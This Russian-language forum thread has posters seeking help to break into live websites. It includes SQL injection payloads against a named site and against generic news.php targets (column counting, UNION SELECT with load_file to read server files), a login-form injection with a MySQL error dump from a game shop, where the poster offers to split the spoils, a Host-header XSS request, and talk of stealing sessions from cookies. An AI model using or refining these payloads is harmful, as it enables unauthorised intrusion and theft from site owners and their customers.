Для меня остается не понятной одна весЧь. HTML: http://www.mxftk.com/pub/page.php?id=-47 id=-47 - показывает главную страницу id=47+order+by+10000/* - страницу отображает правильно. Внимание! Впрос Можно ли както подобрать количество столбцов?
Возник вопрос ... У меня есть cookies ... есть ли вариант сделать с ними что-нибудь , кроме как извлечение временной сессии?
Значит содержание cookies может быть различным в зависимости от форума? Если можно чуток по подробнее об этом.
Куки сдержат временную информацию, которую оставляет у тебя на компе форум/сайт/вообще скрипт. Это может быть: пароль логин сессия счетчик посещений и всё что угодно остальное
Что за извлечение??? Откуда куда? В броузерах есть редактор куков(по крайней мере в опере и огнелисе точно).
Вобщем проблема с раскрытием скули в логине есть сайт http/site/login.php Поля мыло и пасс. Реагируют на кавычку обычную в логине, но как дальше быть? Пишет про некорректный запрос и все! 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select 0x78617861'' at line 1 select osc_email_addr from osc_activation where osc_activation=0 and osc_email_addr=''select 0x78617861' [TEP STOP] хэлп плз
донт ворк, пишет просто неверный логин. папка /includes/ открыта для просмотра... есть имена всех таблиц, больше принципе нечего не накпал. Те кто хочет быть помочь стукайте а асику, все что поимеем поделим(это гейм шоп)
Всем превед,нашёл тот сайтег прикольный гг)) При скане нашёл такую бадягу- XSS через HTTP. По дефолтовскому коду дали пример: GET /SITE HTTP/1.1 Host: ivbgj<xscript>XSS</xscript>.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Connection: Keep-Alive P.S.: SITE- хост разумееца : ) Переделал и отправил: GET /index.html HTTP/1.1 Host: SITE<xscript>alert('XSS');</xscript>.ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Connection: Keep-Alive Серв либо отвечает,либо,если чё переделать слегка, выходит,что вообще молчание:Р Расскажите, что я сделал(или нахимичил хз),а всё никаг.В подробности уязвимости был дан дефолтовский код. P.S. Юзил перехватичик+отправщег пакетофф с сайта)(( (Хотя... в HTTP йа нупище,стараюсь=___=).
GET /index.html HTTP/1.1 Host: SITE<xscript>alert('XSS');</xscript>.ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 7.0) PTX Accept: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Connection: Keep-Alive ты отправляешь в никуда
Помогите чем можете. Есть сайт, на нем скуль инъекция. site.ru/news.php?id=-1+union+select+1,2,333,444,5,6,7,8,9,10/* выводятся столбцы 3 и 4 делаю так site.ru/news.php?id=-1+union+select+1,2,load_file('some_file'),444,5,6, 7,8,9,10/* - вылетает ошибка делаю site.ru/news.php?id=-1+union+select+1,2,load_file(char(тут числа)),444,5,6,7,8,9,10/* - пустота, т.е. никаких ошибок не вылетает, просто вместо столбца 3 пустота ( в чем гемор ?? доступа к information_schema нет на сайте нет форумов, нашел админку site.ru/admin/ , там доступ закрыт через .htacces что посоветуете господа ?
